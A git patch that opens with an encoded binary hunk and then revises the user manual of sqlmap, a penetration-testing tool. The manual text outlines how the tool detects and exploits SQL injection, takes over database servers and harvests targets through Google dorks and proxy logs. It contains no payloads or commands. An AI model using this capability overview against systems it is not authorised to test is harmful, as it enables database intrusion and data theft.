zXfU!p#!qM)`kD@9u53ijQ<at`bvM>y$}cZdh!u3XoTvzcs4erWX^9>;Rf_JXtHtLY
zDXVJ318Q-+HkaYkW(3rdx$y~=`EV{HQ!O@ksVi4JKBLzNefOw&RjLPJ^R=MDzFS=_
zoDhIAjY=x!^61T<?N-wij|Zh?R#!_UU?OQx;DffThN{8{M2FJm?i`OoVHwp>({g(=
z&`%r_)^=s8F3RW?g{OMx2WbWg5m+(7i!vXe%tUVndIdNHEGwoULr^PS19f^cU_s*p
zeg~iERJb4GJ}X02<HKe>REFpT$Vx$}9wFT-<Px(Ar{ll}d`2_z88vD3GgWXc9pl?0
zQ%%GLKbz2J6-<Tpg~TOj$|8o7dQ=|2QZ+?<86LOP9Un=qG;LT=O`7{br(8fx;=m9s
z(+$i?)boT}P1IaO8%&=jXR5`)!C`K-v`SMIt213KM_Dz0P%VTi<nhPAVQ4Dk!o`C~
zuO0QFsJb2$l~r9WHYZ8d8hO-`xUl+Z4~oRZ#L~i;6wB=w;vuN>Dgn9mJ`mZ-DW4E3
z6%ze4_Bc5wSmh^Hd9-CgjP#L$YCP!WP%08pE5zKVFIZamB8FzC7j4>^sg_GXLHe+O
zq$Ep~=>nvzTP-+uM`0EGqA^GeP<2qcsO57f_Ef>~*#T7DGn+n6%EZSreN^oupISV3
zh(^JMiz&_doJ1vQ@77WarHbFA8imNHkcgkelBrJ<7GKa=EG=q!0={Vzf@&#Ps0Vy%
z>0Efdofa3CbQ-c@m|($D&+vO@P%WB5G^r926%|ns4zKvt(s8in=}$;|8)x@W9tjUI
zGf*B04}H2PhQ%rl#d;!25Oa-wlIjqGpu*fUL)CalA8L8-2#uK+2fi>(UG$5#vW8kn
zYl^AVG$8yJW+0C4OM!W<8&CM4dsFa1*B$Udw~X;Y-!c)t>L#n#gQDmsxhO-CMl#{i
zfaAxow(&uC&ESJs9nOc4KGHL0XoO_ZAnapSiP<{CenXLF>kNwm_kNqs5!&ofNk5^2
z+2ks1b53RoGfl2bM?cUHLzl+~v-!r}35wYs2w#$okS{SA)K02|+Qlj{n{QZ?xToA~
zzF`f3qN5i0K=ZDGA%DDl-U&ytT!W!7BDb;lX<A}Z;oX3sn%p!X)JK-d?3dxAMsBmA
zhDnPX)Xj$CEF9)VDeb*lYGF}mHQlx`3vJSG<fxJ0qpqkrq0^f~<5Gf+vqxnQ8ajZS
zX9N0CO4H@{<mgd@1`g3lhNtR@?7`wY4v&Rut5u4cM_cWHEClta+G;OI)*ouC<={4h
zxrtMx0Z*`o+f&8uu2L;;W}BgXn`Dpb=c?MI7JlSOG*=zf8+DByN$<iA8rXZ-&|$*{
z^&64y>eO$<NT`!8h<}_0ig;^cKg3R3lP;pF+PPnEZ(|oYOtSE~VcB@ssb98hjFpAx
zHU^9x(XW4AM5hP*p}cPMp9i2#0HfC5mAAD?Bddh|5z(SyS}+>8#Axsu(m(CnI%?_S
zxNnCrFZ$;iq8ElEPGGrqzm6Iz?gOl0))o61FYst>>Z(=hV#w_|-AGPapPlB%;RphH
z>@<AFHKE$3x@t-k^T_cN4ocA!wbQ5w5=eF$K8u@?WE#1?9W(^%6O>@5p*+~|I!)W&
zSk2QBg^{1wo(P}CVJim>q5fn{*=Z<D_?GQ7e8!m-tzA9zPc9Z7T$;}I<R~IYmc5;Z
z&sd?HM(DgF9m<nwC@(-JJ^hQCql(W#lDG8FPNNm=pap{BaEhIV0>x1nI}M*jFpWeD
zQQU%!7Nu%~bcWhS#4|Vg`E)xCpF?CD$~3|R9kie)MDT>2M&*$c+)l%1JdhscMDiav
z5(YgYFvU(ofq1=LN{1(kX*02>!{-Pcd~(oG9)&OoS~+XgK;rOafVYgb!41?3Q9!H|
zv0yI;Z4fUO+i7mdCPF$S8V=D(G!#ehfju3L)`>_EI}PQD<$+<cPYeC}T?Y+dpft1?
zMdGlt5)|m=qlk;TWX6TjHyeY67(;<{^Ik)>NK~3IDAp%WB0TjaZa%g*6D0&GBFIid
zUUAG#rV-5TpoIew0;A}kwQNvefN&1_7h5*aGbHAs5=dz&9grc?e(ZTso;dPnry*~U
zA}?$-8V^{i@?uAU1gO{&(jfRA(LfRSW>1Im1n%viMNo&cVk!><$d-*qz{8Hrcp;lf
zs0gl+;suJQapb&wQ^0-SCa0suvT;Ws$#{WoHW%<bHxm?iqnofqN5u$IGRN2)PV^Wl
zo$0`T%q@vXG{Ul_0@*O(L~EF$;~eR*<MD}!JFn$+5kZVz5U0=VnW;dEU$WEC7$2X6
zxQbe8AUemlaPUuF%qUMBuhr{_ntBE9l$MqW=0`vld1xS;NGMQf`ck6<_Ek^6VL<@J
zc6QDm#lVy1D`gIn4I$HH5d<M39&5L!Lj%QuSvw646uu#uMmxMi9#VnwW`F|4J!n$q
zu(XcxGj5?|9E^yID(!hup14%opfxwtI@~rX&3+Up0`2UXA=t(BZFU+8ggUBaH-`=)
zO$nM2Y?{yoq*6K*;U*Z<UM%ur$KW)1q2b!KkSV^NwpJR>aPZ9m_cF4P##N=#NK=6X
z>e?HFQ|;lfTWi-sO<}4iUbC0?TRL({2(?rMLi@DkD54NsVcPH)uoVSZ`%rI)>|uLB
zU<|eoMho(Oz)F<zqPzfs+ERJCB1}`!WFRULp}h8l=#_|Iu+vbWh+enTkT?7YMu%mN
zkm6&X9c8ExDv-bdsX*vM+PTO141?(Okq6kG97TwWLG3i5V@v5kLlc~NQJy#pZ_kVJ
z#H$2Ev$ku>OqjYoA!v}>P8x3X7mq#I)1g2t0%tnP%k)LGMUuvu(0ULZEcFBhinlxM
zm7qWhi0siyEswio;m49H#I+6BlvyK~N{({a2vd3T@<MqcR8?w20Nxzu9)ki!oPs?e
zl<F`Y?Y7fUpm18-X_S{vP)oFsY%AebRS|Knr!)2#6d0sP4k_~^Bq@$`OO@cBN3Oc#
zC0SXLp@G6n=cuC{h_W_CH$KQK5e*bqC^$0XZB?!wXq#TcTEI0C1ku=&qX;ZqCk+N3
zU3BG0M>IJdY;m|2oas=Wc>BR#2VoZERCa7#M3ko`;VA?!*)yX+k7cu%x)&@^J{1FO
zrvdC`Ekp>asIJP>o+<4oXpFc~&0aBR;<5}ojS7^xfU8a-vP7Z0eA-0=0-=)%6qi=p
zX(%u(?<XiQK(0i4I?#e_a|75#hg0n7P#%s#faa9fn2HjsQDBH%@b=8G{lxPpb{Z83
z$?r&qyfAt=ji59$uNZ&W2}};6z#zf7W<v479S|oFWSXqlLzNJ>aM;tKyhkW_0c}WI
zHC4Q(Vo!_$L}-hhh5{g&<pu@C8_M={1R)UCYNx?)VHzjO6IYxg9bgx07Q-C3u}72w
z^@kUTB_**N1&XI$>=mOiOg8~dT2UATyrC$<z3rJ%AS8^lCzP4bVw{weI0L}|COY$?
zJZ|EEs}TmPVXT-m4nyx|1qLDnG}{}E1_mgYMxq7D>20UsEhlm757CC0?1$FC^j{PR
z;o!_nG>S5F6c_=dDoIV0Cyr*=(*etD_&h;vu$&%I1m6+^LD{H5^$}S|AeuZdcxVcy
zj<cC)lE7Ld!5b29J3HHnqhm7D$g-0djsnHyI&xmQBLK|A6HZ1tUGU=dsYgr`V2Nz2
z39)Sj1&S9L>=olVDe;E9orVTJLM!SM^2w$;3KZAk*fYZpW~Lnq<d!w|aq_v?^SZSo
zZ$Kl5K`T#EDnZ6oQM*Hv6-ANyBJmrAJwjL_(ojl=@(_f^c33D_5^qtUcwNfgbX@tx
zbSV@VmS+=a;(V4pFJ7Y(=Zp+mqOrqj4M)(d4<n1jCeY-S0Io;mcA`y>Scr&$W2+r{
zD(fSJg3JsQ2<gZg!}c~nvkWD~J6Yn51bfF(9@{mLS3GiIq|;|T5oO_s0>z!-Qi0+&
zE;|i*8MH|>8E3`zfbn;B&hN%0UE~Xs3KY&Qi58T1a}>xBH1t@!+a>3fHD5GPoLzOO
z8+a}3QDY1Pku^}9Ym+L0edbID@W<Rxt^E`Y#HJHVC!`))^9aNXXB?#!L<P!hg_k8F
zBP1v<!W}XZR2{3B8t=tUC+?QB_XGuoWrZ0qJuoz9X3%gSn3Dz!M!1lr^2D;Y)5sN|
ziyQRc-0O%a<AYS7Y(S!cAz9`luXvC}s)SGK01h(Qxk~&;flz3iJwbsOC{B}26LKgp
z{Rm)-9Ri?6!BHTtm7|YVhvB%2G7S#aJ7YCOip&L=%-r0jm;U6A;Hf$aR&Z7ft45#H
zHcbx*k?Hn|wGi<S(ip>)0A)ii5F%S%#`JuGv?7pKg87O6aAr|VgR_MWk*&jdaMLi+
z3KfTQ1~P?Jj0^S{XJE49-AbuqT(8J!5zazHa<Bq1TUlNhJFIiic#OFfgI?fqk~bJQ
zMYwqZXNQad!<8UzBye&NdhsJBup~dgf7k-dvk98KeM8KMI}7ZU_#$rm&MJlps!~Ko
zJ$!ItG6y5Pw%&;3DZvvL;z3wPCBPKqiG-OTo+-7b0~es2$ioS(LFNM7;noVXJSBK$
z)h?H*V9YjgKH6Cc&T+GGk8n%}4i&a?@CK`_2SkB`Fl7fct_$L|Q>J#~Jyh94hP+&S
zBSe#N0Vg5>xYGKwNhGMNvK|1hjR*pg(lKO~ygO_w$5W?l+yQsQ5CLuQFf|d6mx}j;
zoK@h7O?l*?3CY?g977!If-qu(2`)1sk7{YL3no}H4~`}~AV7`65Mk9xQ_BlXN|u9o
zo|MT!=qd8_#m;MYR~SkdFe&Ds!7FEUV+8$+HIPG%nET>Xr6V06DP{qXLyDCbh5Ti#
zM(Bzx(Xm0uQUTx^S6OMnN~#9ZiTe{A4fMizBMuV(W4*&Q7P6{=XUb&20gj=7Y+iyE
zVpym*3_V5WAdVr}I;<}OIE&cs4uz0e7+%Ekvj)Q2k+&Q#%wM@;1l`C=7`#bQLm9Gh
z0Z}dtP=qB(5poU|VlQUCQozo#Qx9$@9t;6jl<rDF|1I|8xiJ|!L1uAhr?X<fpz@0F
zAu^2hn1`FV@m98jTY~=x4Pr|N04i?`VlU;139W*OEgvSjJWOQ7$-*0ZQ<Ry$Pzc$$
z<Gm?1;e0`H-Hwwp5RI%7z!~z2z^Mddx!aU5Jo&^>Z8)mgtj0@Ovhqz{Nm(z3OGBK=
zax@SMiF0`p|6wUIlL6)in}pD}m^4E_9??J%BP&%Llzn#)=pj#38Yk@T^zIbpjZIA4
zTg+xPgc(!Ja7Qt7`r>*hnKNW+(}@!L7gNG;DKW$9a1}A<49;W9>m6W#j1hvsyp^EI
z2s`+X3*DKo826_$vFwM*D=#sa+VWf=w1kxxfa_c4D*O>XkEDdbu_JC~C)QYU0s1o&
zG{8UE@`R*dff}$eAJGx`nT#R!m|!#J8{6Mu^2%V08!r*`0d@nJfK3VDv`l|T5De4R
zF`1aG3c!yb>+cA-V8#UGKdBc&Y*`FKoD)-j0sz3}Wsf_=m}mi_%H}L&J<|qoy_u~J
zLv29BAqx)!@W5mmCJFbt!1j`-6M!iuf}p))F3^OC&4?hxCffp_CduAs0@)d|i3Q0v
zN4P1N)&{$VEi~M^Cbkdae~kSIB$W3fay`j3SRzaklh1_pjs{uoG0Zkwd1Cwt-Dis+
zNI{lzX4EV1Ti88p<EdM@h$E5Q<FFbY;rR=CqYPOl&j5>}fcTQf9p1$N(_ImV8`H~;
z047X9)@ZojbWV4-u^;|Vw(M!olP4E$qhmr6!IlnnfMywv#0<p>hr-GF6T*c}GIJqP
zS?mGi3$w-%WWXd5usnu)gfMZKVSvGB;sz!FQwBp=;HGFZB^$gm=5Aw6S-@g!=AgT_
z>1nKRh)?Fc2toGAa~5^*#=zgh(m^1~G&n|?+8v4l50w`ILJ-*e1cuJGO`IT?y)}TX
zg^!&E*x~|W$r)F1)?Da#juno06<HKOQ4rV1I|~G!CvS7`F)+|14C_zs94uJ-!qrze
zggry$5pl$%IB;+#?GY5qCTo}`jU*jlvoj8cgHfyumJkkEnHB*UDARBnn^(d^#3A{Z
zLJ@&kCdxzqt#LvfZ0R7@hN(sXSJ++#D4QX7gdWQcL>!)@Ji&jc>`ak|w~>h!+}9^B
zJIoJ0Sz*4hl|$i@GFNdjAj(u-ELo;;;zTtA3=pWt<_B)6W10-6n>;_T(?ULr;fxsu
z6o<-89E86!-6VoAKS}r?FEbXP4>LpqG?*3kc?A9=GjvWnk!bK7NE43YP%Tu=kb0mo
z^9Xsx&7bxqi*zAb8=xu3&{^zI;)Y6RW*kY9Hddq)*DTu8VJ?WPMeQ`083?JAItM4S
zxer=~0n8Cd3n?Ld4)U5sC@KDz)A48{Bw~^fb;!}*Q5ZtNK4kX8ZkIP(6bKKlR5A1^
zHo55RncNWwQQ5LZy_o8fVL%a}va=Lz3CU|4G=|+FFTzLV2I6KFNe1A_##mUHiOy00
zql_to#&lc)G-NrCbmHl9$G8LOk=0bhG%}SGF^2F2%M%1MK~}CYxx%t^#BhrDa-0=Y
zc$>rp0FLthLV01a>idr=f-#)pvR`L`KqcgH$7;81D|0D&c@zq!7EV*ijRCA?HPDDL
zM8yp1L}uoNBV|z*t)Q`BdCV=uXh;=<`!YuDK^znd21FDja|Ppo4D;Aiv?QCD0E%R#
zgn}StQyDZLMY0M0TkMCsg0U4Sle|S^E{K~v9K(bIa%>*q@@iTCBlz7GK&k70u+bQt
zO};RBSHu|~X5iyZQH+$tYFcBm_{J2JbwZE7Dp<`D;$VU-;r!a9vC!7>0G4b&!|Tb;
z{NcGRG+u5K0()igfcK?jMTuUdVnP?|jO3wnw2)ce(qT)ATZ|kdgP<!JRR!$A&fFj`
z12M2fq0(9%F-8lD9FwpBOX&hHXT=e5Pmq%a;9O=n0$AD90kF?TD*zaoZ523^E`tMP
zZOQIwilB@wd)@e>oq`EncsO|jfj<xzi2v4NA?Snk1ki#!7oktd-~dHm@*ZQWVC5ke
z$+mrn@ki!IgxKQtZ+XHYqEa?^;BIAb9o(|a$A)z5I34B!_%BOSAPcfZ22W_vHfe;>
zj{?P&Z;rWuysXCv+ms`0F_z--IKh95{fM(;8(|PGQ+W~sJ7O{on8YJ039(6yyp9eN
z|KW2Au#FJ#g>3u+g<<w4^3u~`#Dv&90vy6LG@u-^&4RqaDDMewrn5FPV^+go!j>Xp
znb|4{!Vs4yEAq-4CdS<~9iEQ08o@<uR%5$l0x4*7MVmV{^2#O#1;d84?<cF3qELil
z5=WmrxNMJ2GFT*R#>3yhW;|3=*-nA-hP_=H1_()^y*bu6&=kgAc*11}mqKr4_?;9r
zwhFKx$}u;{i+w!S7=4W+vwh*ygrP&oO#0!5IyU2BA2F#0pNouhU|iXm83b8I!;G!)
zS2DK3vB?x1#OyJ)B211c)KDau<V0+r&Q<i^TH}ZpX4)38a#=Tp_ek86?pRhh;KU{)
za1OR~aWS03DJs@@7#H%%%L@0|F=>U!D7Mi=U~|cG91w}TtSCmqX^YYj0})|s9R3ET
zkHB<ih7aHY8EeJaZE?}PgEMq6QCjzy3y^AJ651?sD1&S%MqqHsoPi+bG<Y3ZI_^L~
zG_n+%QwnUrNe&sfg2o9?nl}4&oQt9;6M1YwgLgZ&jHt(;iD!hJy@$RniD0B-3Nj2J
zc0L967=`1C6>3dVx(!6ORVlMPJWyS*(&YwXBy4M6Z#1MWPlpY`%$r-6^SJP+-Asz_
zh3R6`5%e-(ol0{Mb{_NAW7yfDPAGhAs{oDp84#HxV9l0x?ow!uEEW)k13b`dywP@;
zow7lWqk>15p+AVylQ(t*?a(`$R8x%a(4b_~8iit2$>|W1AoBuXhpc1MohIbFE$plW
zI5O^XnxUp-OG}2*%a|n8Sa!4wH1QOQvsmECk|u@j51*r^G=!NgiyjogJS(W4odl!!
zBwTNHj%J0-g-2isNNz6r7*`*GB@m=7@7Dl}0EbDO25ew1TMJi0LKek>0-1t{I4TyX
zi@f3qX*=sMWm)JAv;*0%hNv^>@iOFw0)uSaky+kQ&^~eFuf1Z>U_!_}#>G2~3-Ec#
z4rfd^{3mAylprs31ZBvYDNR*5ZUo$iC}QOSb}(oru0))cK`CTr&N~`9wjlAqglx^w
zu(O$q;}Nno69xXnyd$8ATb><k1@<jRLLeQ^CrG`c_%xY=z$WDF7gGk&JhF_YIVi~h
zOeE$7#)$xE{Bp&>7Z?prR(a@fJR!ER7`PHe@XNXwXxIl?CBndWaE1<X$~{H^KOL%Y
zrlSZoi54ZxMV6S*dSxyENMpy4Kw}y%EHHM(5>zCBQc}fus+&A3VvjWSIJi~VIUCRz
zf=Z~KtVmE^Cg!n|vSEUxux-OSQi06O9|W+5Re~vlolx!xTqg1`(dA6iJVJTwtiRVk
z0NSiPX@Cy1C5D(JS$`*aB!fbriDyO};|`%0)|M@#8wgm_aXe6>A^w8Rk^tfp<t~E8
z1UqQ5V-j)T03!4{V!~bo+sG9|6O?&I;3H!X1Pf~n$INiKh`4~>#tH~~IJ{(^9B2ST
z<;DOKk=F_$>-ZP|V_^-1!7M9l0gS!uM8JU#c3T)|$SpSpsHZ8g4ci!YE(~Eg9rkH?
zc0!<8Hk2jo;fl3(0IR?VJ1Yoyley6ea<-eH#9q)?)G}zyqR0S|%ThX%E4LcPL(r!U
zUjhY19vO<!=QO`;ui@MYyG{)>21wE=7`9(Pi8bxX*qp^F0>*IwKXP0RtPcRL(#Rl~
zPPXBoCg4(HIUPWB=cr=NQtXaA{P2Is&JLtwo_Odd?2H6x2yK-shAz#x3Y=HI_Y9dC
z6iTWCvrZ8D$@UP0-^f4`@-o{Ik>2q384a}NEM9rw<MfC*3x6k{PC#em-r-C<>oI^S
z*(!-5Hj){KpfPtYXzctGO+gtE0Zlw1Ws^(f2xj0DX!J&$WJFR(lyib0GxP~g!!r}o
z7z00K24e^dSDvi6E+!^mO$7zvrE;(_g5bGDizy=`l1Rs(Itrj?D*}-pY(tA8EI@XL
z!0>|tCim_U5*yM>1|OjVu^=bV*wG}=1X$rzP!Q0>lne@Jl9v-!4%=999|+SEz*C+s
zY`<u-nLsuHn8CFp_ZWUhSuVilVQM#lB-)X8)GAS?R=~Vuiv^A$R%{pncJg)zsF2w?
zbc{hB7^n`0k1YlnL7xc9Ko@AtbBsfLxJ*atH+DX@a>Lj|<UzpG7|y}MSi(YO(fXjV
zYqUUv-$t$&JAiD(0jOnj7I6wp+~Bng1kuO^ViB+cvH0W_36Pgbd$P&pRSzVYt!9$B
zMtQNlj9?npJIGDe7+n9y(m_};Rzno9#z2#C(y*67+H-bcK;^j&w3Pv46rjb@Mc9p}
zFxL=bA#oZpR=%(l#Nnk|3wc837==a7AwGbJOqgPwF-bu7yvbE-F9QP0)LKGnWwzqP
z9)lrp8kcDU5F$(`!)qO~8WM%uo(0l_#yqH?v2ZpZ4(xVN(AaG*pmCfrf(_H-!WGFR
zolK1rkzs7Bz^#QLuNGJd{|@X6c@QNC9))2`W6o$OdCaR08oPstOk}5kpz?qzi;WY)
z!fYvkL3U^bG`7e=WA+qin4->(z%~TR%4kmiG;KTtz{r~)EKt@vy2nBWN61o@eT|TP
z?BFnHkI0LNKiMutLOjePw;JXvr-^Id(S92T`Q3~-#KqJ`(99US*k(cZhR7;Ej`*+(
zCFukhZy?T{NNXJNHQ=G#5ppcqY2ZH{ALC=k?`K0g77v3xl!-~uaIv+$5~_n77K{dC
z(a{<tq~JxlC-5f9O9<%@1R@nkVSsXv>Ab!q+ku{2C)%ye0z{^H6U;6jbOH_cWy%!;
zGi4otxMv-K`s{2V&Q!oiW$Z#QQw%-RodmFEoJ)sR4u$)$#$c0@Sxq50tTAAqZ1~{h
zAB#}}vccj^Km#l(a{&+or?FG+$P4jf<TW=7h%I)-324mi3tC84l@Qv;b}rD^88y&?
zGQtoA5mR0632YKJo`@Ca=@^UwcNM$h8ptub6caQG$|w0}6CiZ&gIqEEaWafS0f|f!
zBCcMBs*sLZYXncnmZD+!fXEOY(14&woPn1_#=d}+GxHBLWS8>-gOa5vj)Frkk`rQe
z%d92@UCs;*S=Ll(-SE7ydt@0vw`71O_;2li1j9PlCqX{!(jj0e?C>OLETSJY7UwLY
z8O_;mUjGLo<ciD%I8G#08tE9agm4KKc?BA?w4wboY#Zwz2ODHz0gX|{nQ&hlM3>Y+
zh!k0EMmm@taypErJj9s3!X_a8TkMDQk*yKz+K4b>1+pknAEr9nqR9cr8UrbBn@3{&
zk(nuTh#p{(6`=WK{{=`~!eK4RZYH2$?5-AiuB&T9wNMlv81N0f%Q%%`=MV&<EFTEP
zW9)_FmC@iiu=Ske4m?n3sVszWtU```M?!X=Bz0W2>p)}CHsroy%M|XR7%*ZAAspH<
z0m;~$fIY-|0?UGpE0k|}wIH66=>z2Cm&=RN4Q+B}x{fxsP6a-Jlk%38X*CeosO;`T
zI-r@-q{ZP`IVcKKLb!~aLI^Rna<l>x0=tn5#C(#+6WctKk}%UPY}_zPa0nQfkyW1V
z9s-eH?t&{SWJHFp%V2u|&|oGx5vCX$V?&97KE;O9ALT$7f^t~6IcUrSi-*!6Wv!kV
z!-Uv(P7_a@(yWgSU5E#=l8>FU3r;P@ene}^n+mjgK93N4!t*)~Yw1D=hkfNR9*6)g
z)u4?rDG7sDMx>zr@Vy^e8)H9S{Sc2QJ6MDDz-BdkT(T1tar2lq68q^E0eNBuAZO$y
zi%?)45kdd0F@ZmeZ8WsA%9|8$A-0_07vgy_(OJcaGmp*wyg~^85XNOY4sgjR1ky1l
z2ORHMcQO~?YhV@gaBnO`PgK@QL1g#ulhd9}E=2k<H48^x*-}K{Cfg5i%F!4Sn-PjV
zf{i<%H5sIUgko47XxxA$KbAZ{07p47J&ZpzIfht*#*Pt!#*V0h#txi=hP&>iAtC%*
zmJ5I~+);UQ;Y}ZA6TrE}HYeQZD`Rz-`?$wJt{B2h-nOwu%ycm$6yANNa$_rD^8@pe
zjWHZ!vVRIYIlvmZG3<^C7@_E|d?*?;>)j`7c>*w#QA|X!aO08?RmOg72l6U`zsnzz
z5KDCT5t#`ylX?Q7%$67!&BQm%LnglA$Ff3@EF%>A0UIYAOJpm899i<LhJS=@$2gG0
zWIudcvXvZ#DZ&K^Lbc5aVzD3YF8S62<i+U(nKLji<#ERuLe3fFX8IpFykz-}O_7Zq
zAW5bN!0vFaZ7gk^m}0UY(=E0~nED^Q!cKIGGQ$%uFDE#+Y}$*y=fk-rA19;xx|k*f
z{ZvM@eNp(VnEb}McZTV}k;RM=S|sw?M!Y&xKti}rg>e=5I)=%q|A7Y#-=k{+WG=v~
z#gt4k@noe09xNGhC)6m00T_4CgUDjfK*I`^CKo(+vO5jxyy%HThk&<=Y0z|$tt=P9
zxS^N{AM#eoGdPUv0$FCvVAepy&aiZ(f6E<#`;t};@!wiv@Xj%-2GR2jT7iJGu~46c
z*#Fo}hk?zkDR`^w^G%FDwl$mwmRpGHl4Pj|OOdBT00c{i1ux45gdVd^ER1U(WKR+{
zPi*FLW8fE*XD~wa*{p`b#mnPw`1k-P>rxc`kFh_(4k`fAp{omNZpG5kiBfsl(OCnQ
z4kwS~d4$^u9LNgsAIcx1`s7Mr>#)qUCggPR56Il27nJ1TgluH$8eqUEo0;%dF^>qq
zcR4Z#h$M?s!94`baSR$R29q0YSU)uXE%pP7W=jXMhba~mgv+=<w<<U*!9v8v2r>=e
zk7Fr<|JZU^hz4lvE)$BykbME5u`_6pWDNTO%^nmfmMmyNw;X*1B0?LaRs*J&Egdrb
z<v@JUm`e{dcJ~EnmRr`+|3GBHO`x%>y`aY;rQARm|D1*+uq+*fii3tjX2AXBSq&PC
zBg5%I7Ay@KyZZt({@#QK4lc*IW7wg<MP!dPi0u3zAu6)&4jMC3aa|odF9I6#-+~rf
zil+WYciqX$#E(N@vS<a(0V0xM0*zgJ4VrO`D<-&T8<Le)geRjT(sBX~Zd%7Up%TnN
zHZdU>IE`&$$jh!8BpNn0vHw^y07S=a;-f}n55(KOdF#}1WwsyqVn6-C-OQ|^Lr2j^
z$URq9-pt2`^dCxJ(F^gliK|;3gpc7oc(W$Wnt1|^nl^?t-P99k;%??^3Y5jys98Oi
ko+SMLrRm|SS1<3#QQ0F#iT8dXX(2xHR;twW$!2-~54EtodH?_b

diff --git a/doc/README.sgml b/doc/README.sgml
index f4446a5af..65929b3f2 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -15,7 +15,13 @@ This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforg
 <sect>Introduction
 
 <p>
-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+sqlmap is an open source penetration testing tool that automates the
+process of detecting and exploiting SQL injection flaws and taking over of
+database servers. It comes with a kick-ass detection engine, many niche
+features for the ultimate penetration tester and a broad range of switches
+lasting from database fingerprinting, over data fetching from the
+database, to accessing the underlying file system and executing commands
+on the operating system via out-of-band connections.
 
 
 <sect1>Requirements
@@ -47,17 +53,18 @@ via a web application, you need to install Python bindings for the database
 management system that you are going to attack:
 
 <itemize>
-<item>Firebird: <htmlurl name="python-kinterbasdb" url="http://kinterbasdb.sourceforge.net/">
-<item>Microsoft Access: <htmlurl name="python-pyodbc" url="http://pyodbc.googlecode.com/">
-<item>Microsoft SQL Server or Sybase: <htmlurl name="python-pymssql" url="http://pymssql.sourceforge.net/">
-<item>MySQL: <htmlurl name="python-mysqldb" url="http://mysql-python.sourceforge.net/">
-<item>Oracle: <htmlurl name="python cx_Oracle" url="http://cx-oracle.sourceforge.net/">
-<item>PostgreSQL: <htmlurl name="python-psycopg2" url="http://initd.org/psycopg/">
-<item>SQLite: <htmlurl name="python-pysqlite2" url="http://pysqlite.googlecode.com/">
+<item>Firebird: <htmlurl name="python-kinterbasdb" url="http://kinterbasdb.sourceforge.net/">.
+<item>Microsoft Access: <htmlurl name="python-pyodbc" url="http://pyodbc.googlecode.com/">.
+<item>Microsoft SQL Server: <htmlurl name="python-pymssql" url="http://pymssql.sourceforge.net/">.
+<item>MySQL: <htmlurl name="python-mysqldb" url="http://mysql-python.sourceforge.net/">.
+<item>Oracle: <htmlurl name="python cx_Oracle" url="http://cx-oracle.sourceforge.net/">.
+<item>PostgreSQL: <htmlurl name="python-psycopg2" url="http://initd.org/psycopg/">.
+<item>SQLite: <htmlurl name="python-pysqlite2" url="http://pysqlite.googlecode.com/">.
+<item>Sybase: <htmlurl name="python-pymssql" url="http://pymssql.sourceforge.net/">.
 </itemize>
 
 If you plan to attack a web application behind NTLM authentication or use
-the sqlmap update functionality (<tt>--update</tt> switch) you need to
+the sqlmap update functionality (<tt>-</tt><tt>-update</tt> switch) you need to
 install respectively <htmlurl url="http://code.google.com/p/python-ntlm/"
 name="python-ntlm"> and <htmlurl url="http://pysvn.tigris.org/"
 name="python-svn"> libraries.
@@ -74,6 +81,7 @@ You can also choose to install <htmlurl url="http://psyco.sourceforge.net/"
 name="Psyco"> library to eventually speed up the sqlmap algorithmic
 operations.
 
+
 <sect1>Scenario
 
 <sect2>Detect and exploit a SQL injection
@@ -175,7 +183,8 @@ database via a SQL injection vulnerability.
 <sect1>Techniques
 
 <p>
-sqlmap is able to detect and exploit five SQL injection families:
+sqlmap is able to detect and exploit five different SQL injection
+<em>types</em>:
 
 <itemize>
 <item><bf>Boolean-based blind SQL injection</bf>, also known as <bf>inferential
@@ -240,7 +249,7 @@ url="http://www.youtube.com/user/inquisb#g/u" name="YouTube">.
 <sect>Features
 
 <p>
-TODO: Features implemented in sqlmap include:
+Features implemented in sqlmap include:
 
 
 <sect1>Generic features
@@ -256,76 +265,83 @@ management systems.
 blind</bf>, <bf>time-based blind</bf>, <bf>error-based</bf>,
 <bf>UNION query</bf> and <bf>stacked queries</bf>.
 
+<item>Support to <bf>directly connect to the database</bf> without passing
+via a SQL injection, by providing DBMS credentials, IP address, port and
+database name.
+
 <item>It is possible to provide a single target URL, get the list of
 targets from <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">
-requests log file or
-<htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
-name="WebScarab proxy"> <tt>conversations/</tt> folder, get the whole HTTP
-request from a text file or get the list of targets by providing sqlmap
-with a Google dork which queries <htmlurl url="http://www.google.com"
+or <htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
+name="WebScarab proxy"> requests log files, get the whole HTTP request
+from a text file or get the list of targets by providing sqlmap with a
+Google dork which queries <htmlurl url="http://www.google.com"
 name="Google"> search engine and parses its results page. You can also
 define a regular-expression based scope that is used to identify which of
 the parsed addresses to test.
 
 <item>Tests provided <bf>GET</bf> parameters, <bf>POST</bf> parameters,
 HTTP <bf>Cookie</bf> header values, HTTP <bf>User-Agent</bf> header value
-and HTTP <bf>Referer</bf> header value to find the dynamic ones, which means
-those that vary the HTTP response page content.
-On the dynamic ones sqlmap automatically tests and detects the ones
-affected by SQL injection. Each dynamic parameter is tested for
-<em>numeric</em>, <em>single quoted string</em>, <em>double quoted
-string</em> and all of these three data-types with zero to two parenthesis
-to correctly detect which is the <tt>SELECT</tt> statement syntax to
-perform further injections with. It is also possible to specify the only
-parameter(s) that you want to perform tests and use for injection on.
+and HTTP <bf>Referer</bf> header value to identify and exploit SQL
+injection vulnerabilities. It is also possible to specify a comma-separated
+list of specific parameter(s) to test.
 
-<item>Option to specify the <bf>maximum number of concurrent HTTP
-requests</bf> to speed up the inferential blind SQL injection algorithms
-(multi-threading). It is also possible to specify the number of seconds to
-wait between each HTTP request.
+<item>Option to specify the <bf>maximum number of concurrent HTTP(S)
+requests (multi-threading)</bf> to speed up the blind SQL injection
+techniques. It is also possible to specify the number of seconds to
+hold between each HTTP(S) request.
 
 <item><bf>HTTP <tt>Cookie</tt> header</bf> string support, useful when the
 web application requires authentication based upon cookies and you have
 such data or in case you just want to test for and exploit SQL injection
-on such header. You can also specify to always URL-encode the Cookie
-header.
+on such header values. You can also specify to always URL-encode the
+Cookie.
 
